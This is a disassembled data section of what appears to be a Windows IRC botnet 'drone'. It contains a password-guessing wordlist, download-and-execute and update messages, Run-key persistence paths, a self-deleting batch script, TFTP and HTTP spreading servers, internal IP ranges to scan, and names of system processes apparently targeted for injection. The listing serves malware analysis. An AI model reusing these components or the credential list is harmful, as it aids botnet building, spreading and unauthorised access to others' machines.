a12 db '12',0 ; DATA XREF: .data:00424690�o
align 10h
a123 db '123',0 ; DATA XREF: .data:00424694�o
a1234 db '1234',0 ; DATA XREF: .data:00424698�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042469C�o
align 4
a123456 db '123456',0 ; DATA XREF: .data:004246A0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:004246A4�o
a12345678 db '12345678',0 ; DATA XREF: .data:004246A8�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:004246AC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:004246B0�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:004246B4�o
align 10h
a2001 db '2001',0 ; DATA XREF: .data:004246B8�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:004246BC�o
align 10h
a2003 db '2003',0 ; DATA XREF: .data:004246C0�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:004246C4�o
align 10h
aTest db 'test',0 ; DATA XREF: .data:004246C8�o
align 4
aGuest db 'guest',0 ; DATA XREF: .data:004246CC�o
align 10h
aNone db 'none',0 ; DATA XREF: .data:004246D0�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:004246D4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:004246D8�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:004246DC�o
align 10h
aChangeme db 'changeme',0 ; DATA XREF: .data:004246E0�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:004246E4�o
aSystem_0 db 'system',0 ; DATA XREF: .data:004246E8�o
align 4
aServer db 'server',0 ; DATA XREF: .data:004246EC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: .data:004246F0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:004246F4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:004246F8�o
align 4
aMail db 'mail',0 ; DATA XREF: .data:004246FC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: .data:00424700�o
aWeb db 'web',0 ; DATA XREF: .data:00424704�o
aWww db 'www',0 ; DATA XREF: .data:00424708�o
aInternet db 'internet',0 ; DATA XREF: .data:0042470C�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: .data:00424710�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:00424714�o
align 4
aHome db 'home',0 ; DATA XREF: .data:00424718�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0042471C�o
align 4
aUser db 'user',0 ; DATA XREF: .data:00424720�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:00424724�o
aOemuser db 'oemuser',0 ; DATA XREF: .data:00424728�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042472C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:00424730�o
aWin98 db 'win98',0 ; DATA XREF: .data:00424734�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00424738�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042473C�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: .data:00424740�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .data:00424744�o
aQaz db 'qaz',0 ; DATA XREF: .data:00424748�o
aAsd db 'asd',0 ; DATA XREF: .data:0042474C�o
aZxc db 'zxc',0 ; DATA XREF: .data:00424750�o
aQwe db 'qwe',0 ; DATA XREF: .data:00424754�o
aBob db 'bob',0 ; DATA XREF: .data:00424758�o
aJen db 'jen',0 ; DATA XREF: .data:0042475C�o
aJoe db 'joe',0 ; DATA XREF: .data:00424760�o
aFred db 'fred',0 ; DATA XREF: .data:00424764�o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:00424768�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042476C�o
align 10h
aJohn db 'john',0 ; DATA XREF: .data:00424770�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:00424774�o
align 10h
aLuke db 'luke',0 ; DATA XREF: .data:00424778�o
align 4
aSam db 'sam',0 ; DATA XREF: .data:0042477C�o
aSue db 'sue',0 ; DATA XREF: .data:00424780�o
aSusan db 'susan',0 ; DATA XREF: .data:00424784�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:00424788�o
align 10h
aBrian db 'brian',0 ; DATA XREF: .data:0042478C�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:00424790�o
aNeil db 'neil',0 ; DATA XREF: .data:00424794�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:00424798�o
aChris db 'chris',0 ; DATA XREF: .data:0042479C�o
align 10h
aEric db 'eric',0 ; DATA XREF: .data:004247A0�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:004247A4�o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:004247A8�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:004247AC�o
aKatie db 'katie',0 ; DATA XREF: .data:004247B0�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:004247B4�o
align 4
aLogin db 'login',0 ; DATA XREF: .data:004247B8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:004247BC�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .data:004247C0�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:004247C4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:004247C8�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: .data:004247CC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:004247D0�o
align 10h
aSlut db 'slut',0 ; DATA XREF: .data:004247D4�o
align 4
aSex db 'sex',0 ; DATA XREF: .data:004247D8�o
aGod db 'god',0 ; DATA XREF: .data:004247DC�o
aHell db 'hell',0 ; DATA XREF: .data:004247E0�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:004247E4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: .data:004247E8�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:004247EC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:004247F0�o
align 4
aDatabase db 'database',0 ; DATA XREF: .data:004247F4�o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:004247F8�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:004247FC�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:00424800�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:00424804�o
align 4
aData db 'data',0 ; DATA XREF: .data:00424808�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0042480C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:00424810�o
aDb2 db 'db2',0 ; DATA XREF: .data:00424814�o
aDb1234 db 'db1234',0 ; DATA XREF: .data:00424818�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: .data:0042481C�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:00424820�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00424824�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00424828�o
align 10h
aOracle db 'oracle',0 ; DATA XREF: .data:0042482C�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:00424830�o
aCisco db 'cisco',0 ; DATA XREF: .data:00424834�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00424838�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .data:0042483C�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:00424840�o
aHp db 'hp',0 ; DATA XREF: .data:00424844�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .data:00424848�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: .data:0042484C�o
align 4
aControl db 'control',0 ; DATA XREF: .data:00424850�o
aOffice db 'office',0 ; DATA XREF: .data:00424854�o
align 4
aBlank db 'blank',0 ; DATA XREF: .data:00424858�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:0042485C�o
aMain db 'main',0 ; DATA XREF: .data:00424860�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:00424864�o
aInternet_0 db 'internet',0 ; DATA XREF: .data:00424868�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0042486C�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:00424870�o
aTeacher db 'teacher',0 ; DATA XREF: .data:00424874�o
aStaff db 'staff',0 ; DATA XREF: .data:00424878�o
align 4
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: .data:0042464C�o
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41A391+21�o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41A391+4A�o
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41A391+6D�o
aS_14 db '%s',0 ; DATA XREF: sub_41A391+AD�o
align 4
aSC_1 db '%s%c',0 ; DATA XREF: sub_41A391+112�o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_41A391+165�o
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41A391+1B7�o
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_41C370+8F�o
aNetinfo db 'netinfo',0 ; DATA XREF: sub_41C370+AB�o
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: .data:00424880�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_41C370+73�o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: .data:00424884�o
align 10h
aDl db 'DL',0
align 4
aDownload db 'download',0 ; DATA XREF: sub_41C370+3B�o
align 10h
aUpdate db 'update',0 ; DATA XREF: sub_41C370+57�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: sub_41B925+33�o
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41B925+51�o
align 10h
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41B925:loc_41BAEF�o
align 4
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: sub_41B925+156�o
align 4
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41B925+1A7�o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: sub_41B925:loc_41BAF6�o
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: sub_41B925+1ED�o
align 4
aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: sub_41B925+1FC�o
align 10h
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41B925:loc_41BB3D�o
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41B925:loc_41BB44�o
align 10h
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: .data:00424888�o
align 10h
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: .data:0042488C�o
align 10h
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41B775+5A�o
aRb db 'rb',0 ; DATA XREF: sub_41B3D0+44�o
align 10h
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B3D0+1A4�o
align 4
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: .data:00424890�o
align 10h
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F950 dd 0D728AE22h ; DATA XREF: sub_4143D0+318�r
dword_41F954 dd 428A2F98h ; DATA XREF: sub_4143D0+31F�r
dword_41F958 dd 23EF65CDh ; DATA XREF: sub_4143D0+548�r
dword_41F95C dd 71374491h ; DATA XREF: sub_4143D0+54F�r
dword_41F960 dd 0EC4D3B2Fh ; DATA XREF: sub_4143D0+772�r
dword_41F964 dd 0B5C0FBCFh ; DATA XREF: sub_4143D0+779�r
dword_41F968 dd 8189DBBCh ; DATA XREF: sub_4143D0+9B8�r
dword_41F96C dd 0E9B5DBA5h ; DATA XREF: sub_4143D0+9BF�r
dword_41F970 dd 0F348B538h ; DATA XREF: sub_4143D0+BFE�r
dword_41F974 dd 3956C25Bh ; DATA XREF: sub_4143D0+C09�r
dword_41F978 dd 0B605D019h ; DATA XREF: sub_4143D0+E80�r
dword_41F97C dd 59F111F1h ; DATA XREF: sub_4143D0+E87�r
dword_41F980 dd 0AF194F9Bh ; DATA XREF: sub_4143D0+10D7�r
dword_41F984 dd 923F82A4h ; DATA XREF: sub_4143D0+10DE�r
dword_41F988 dd 0DA6D8118h ; DATA XREF: sub_4143D0+1319�r
dword_41F98C dd 0AB1C5ED5h ; DATA XREF: sub_4143D0+1320�r
dword_41F990 dd 0A3030242h ; DATA XREF: sub_4143D0+1569�r
dword_41F994 dd 0D807AA98h ; DATA XREF: sub_4143D0+1570�r
dword_41F998 dd 45706FBEh ; DATA XREF: sub_4143D0+17AB�r
dword_41F99C dd 12835B01h ; DATA XREF: sub_4143D0+17B2�r
dword_41F9A0 dd 4EE4B28Ch ; DATA XREF: sub_4143D0+19F3�r
dword_41F9A4 dd 243185BEh ; DATA XREF: sub_4143D0+19FA�r
dword_41F9A8 dd 0D5FFB4E2h ; DATA XREF: sub_4143D0+1C39�r
dword_41F9AC dd 550C7DC3h ; DATA XREF: sub_4143D0+1C40�r
dword_41F9B0 dd 0F27B896Fh ; DATA XREF: sub_4143D0+1E91�r
dword_41F9B4 dd 72BE5D74h ; DATA XREF: sub_4143D0+1E9C�r
dword_41F9B8 dd 3B1696B1h ; DATA XREF: sub_4143D0+210D�r
dword_41F9BC dd 80DEB1FEh ; DATA XREF: sub_4143D0+2114�r
dword_41F9C0 dd 25C71235h ; DATA XREF: sub_4143D0+236A�r
dword_41F9C4 dd 9BDC06A7h ; DATA XREF: sub_4143D0+2371�r
dword_41F9C8 dd 0CF692694h ; DATA XREF: sub_4143D0+25B8�r
dword_41F9CC dd 0C19BF174h ; DATA XREF: sub_4143D0+25BF�r
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
dword_41FE50 dd 0F3BCC908h, 6A09E667h, 84CAA73Bh, 0BB67AE85h, 0FE94F82Bh
; DATA XREF: sub_4143A0+17�o
dd 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h, 510E527Fh
dd 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh, 137E2179h
dd 5BE0CD19h, 90h dup(0)
aBadAllocati_11 db 'bad allocation',0
align 10h
aBadAllocati_12 db 'bad allocation',0 ; DATA XREF: .data:00424A40�o
align 10h
aSS_11 db '%s\%s',0 ; DATA XREF: sub_416F86+DC�o
align 4
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+10C�o
align 4
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+14F�o
align 4
aSS db '%s\%s',0 ; DATA XREF: sub_417119+BA�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+F9�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+14D�o
align 10h
aBadAllocati_13 db 'bad allocation',0 ; DATA XREF: .data:00424A44�o
align 10h
aIrn db '--irn ',0 ; DATA XREF: .text:0041BC44�o
align 4
aSS_10 db '%s\%s',0 ; DATA XREF: .text:0041BCF1�o
align 10h
aSSS_2 db '%s %s%s',0 ; DATA XREF: .text:0041BDBF�o
aS_15 db '%s',0 ; DATA XREF: .text:0041BE51�o
align 4
aRm db 'RM',0 ; DATA XREF: .text:0041BF25�o
align 10h
aBk db 'BK',0 ; DATA XREF: .text:0041BF5E�o
align 4
aUnm db 'UNM',0 ; DATA XREF: .text:0041BF83�o
aBadAllocati_14 db 'bad allocation',0 ; DATA XREF: .data:00425224�o
align 4
aSS_5 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41829C+42�o
aSS_3 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802F+159�o
aSS_4 db '%s-%s',0 ; DATA XREF: sub_41802F+1D6�o
align 10h
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_41802F+24D�o
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_420238 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+7E�o
align 4
aS_18 db '%s',0 ; DATA XREF: sub_417F01+B6�o
align 10h
asc_420240 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+CB�o
align 4
aSSS db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417361+C2�o
align 10h
aS_4 db '%s',0 ; DATA XREF: sub_41783D+4A�o
align 4
asc_420254 db ' :',0 ; DATA XREF: sub_41783D+7E�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_41783D+8A�o
align 4
asc_42025C: ; DATA XREF: sub_41783D+E1�o
unicode 0, < >,0
aS_6 db '%s',0 ; DATA XREF: sub_41783D+FA�o
align 4
asc_420264: ; DATA XREF: sub_41783D+124�o
unicode 0, < >,0
aSS_2 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+24A�o
aSSS_0 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+31E�o
align 4
a001 db '001',0 ; DATA XREF: sub_41783D+33A�o
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41783D+3D3�o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41783D+417�o
asc_42029C db ' :',0 ; DATA XREF: sub_41783D+499�o
align 10h
aS_7 db '%s',0 ; DATA XREF: sub_41783D+4A5�o
align 4
asc_4202A4: ; DATA XREF: sub_41783D+4D9�o
unicode 0, <!>,0
aS_8 db '%s',0 ; DATA XREF: sub_41783D+4E5�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41783D+52D�o
aS_9 db '%s',0 ; DATA XREF: sub_41783D+546�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_41783D+5B1�o
align 4
aS_11 db '%s',0 ; DATA XREF: sub_41783D+5DF�o
align 4
asc_4202BC: ; DATA XREF: sub_41783D+64E�o
unicode 0, <;>,0
asc_4202C0: ; DATA XREF: sub_41783D:loc_417E92�o
unicode 0, <;>,0
asc_4202C4: ; DATA XREF: sub_41783D:loc_417E9F�o
unicode 0, <;>,0
asc_4202C8: ; DATA XREF: sub_417676+C�o
unicode 0, < >,0
aS_16 db '-s',0 ; DATA XREF: sub_417676+27�o
align 10h
aS_17 db '/s',0 ; DATA XREF: sub_417676+3F�o
align 4
asc_4202D4: ; DATA XREF: sub_417676:loc_4176CA�o
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_41748B+21�o
align 10h
asc_420310: ; DATA XREF: sub_41748B+5E�o
unicode 0, <[>,0
aSS_0 db '%s%s|',0 ; DATA XREF: sub_41748B+95�o
align 4
aSS_1 db '%s%s|',0 ; DATA XREF: sub_41748B+C5�o
align 4
aSp db '%sP|',0 ; DATA XREF: sub_41748B+F0�o
align 4
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_41748B+12F�o
align 4
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_41748B+150�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_41748B+18F�o
align 4
aS_3 db '%s]',0 ; DATA XREF: sub_41748B+1BA�o
aBadAllocati_15 db 'bad allocation',0
align 10h
aHs db 'HS',0 ; DATA XREF: sub_418D17+28�o
align 4
asc_420364: ; DATA XREF: sub_418C40+89�o
unicode 0, < >,0
aSS_7 db '%s\%s',0 ; DATA XREF: sub_418B1F+4E�o
align 10h
aGet db 'GET',0 ; DATA XREF: sub_418552+B7�o
aQue? db 'Que?',0 ; DATA XREF: sub_418552+C7�o
align 10h
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418552+10F�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418552+229�o
align 4
aSSS_1 db '%s\%s\%s',0 ; DATA XREF: sub_418552+1F2�o
align 10h
aSS_6 db '%s\%s',0 ; DATA XREF: sub_418552+25A�o
align 4
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418552+3A8�o
align 10h
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418552+2BE�o
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418552+3FC�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418552+51D�o
align 4
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418552+54A�o
align 4
asc_42049C db 0Dh,0Ah,0 ; DATA XREF: sub_4184BF+11�o
align 10h
asc_4204A0: ; DATA XREF: sub_4184BF:loc_4184EB�o
unicode 0, < >,0
asc_4204A4: ; DATA XREF: sub_4184BF+3D�o
unicode 0, < >,0
asc_4204A8: ; DATA XREF: sub_4184BF+54�o
unicode 0, < >,0
asc_4204AC db 0Dh,0Ah ; DATA XREF: sub_4184BF+78�o
db 0Dh,0Ah,0
align 4
asc_4204B4 db '%x',0 ; DATA XREF: sub_418396+CA�o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
aS_19 db '%s',0 ; DATA XREF: sub_41B7F9+74�o
align 4
aSX db '%s%X',0 ; DATA XREF: sub_41B7F9+EC�o
align 4
aBadAllocati_17 db 'bad allocation',0
align 4
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190BD+7E�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4190BD+FC�o
align 4
aW: ; DATA XREF: sub_4190BD+110�o
unicode 0, <w>,0
aS_13 db '%s',0 ; DATA XREF: sub_4190BD+12B�o
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419477+D9�o
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419477+12A�o
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419477+15A�o
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_418FC6+4E�o
aVis db 'VIS',0 ; DATA XREF: sub_418E51+42�o
a2k3 db '2K3',0 ; DATA XREF: sub_418E51+55�o
aXp db 'XP',0 ; DATA XREF: sub_418E51+62�o
align 4
a2k db '2K',0 ; DATA XREF: sub_418E51+6E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_418E51+81�o
align 4
a98 db '98',0 ; DATA XREF: sub_418E51+8E�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_418E51+A0�o
align 4
a95 db '95',0 ; DATA XREF: sub_418E51+AD�o
align 4
aUnk db 'UNK',0 ; DATA XREF: sub_418E51:loc_418F05�o
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_418E51+108�o
align 4
aS_12 db '%s',0 ; DATA XREF: sub_418E51+13A�o
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419347+32�o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419347+46�o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419347+5A�o
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419347+6E�o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419347+82�o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419347+96�o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419347+A6�o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419347+B6�o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419347+C6�o
align 4
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419347+E0�o
align 4
aBadAllocati_18 db 'bad allocation',0
align 4
aBadAllocati_19 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419677+12�o
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_419677+17�o
align 10h
dword_420700 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_4195EC+19�o
aBadAllocati_20 db 'bad allocation',0
align 4
aBadAllocati_21 db 'bad allocation',0
align 4
aSC_0 db '%s%c',0 ; DATA XREF: sub_4196D1+55�o
align 4
aBadAllocati_22 db 'bad allocation',0
align 4
aWinlogon_exe db 'winlogon.exe',0 ; DATA XREF: sub_419EA0+3C�o
align 4
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_419EA0+44�o
aServices_exe db 'services.exe',0 ; DATA XREF: sub_419EA0+4C�o
align 10h
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_419EA0+5F�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+64�o
align 4
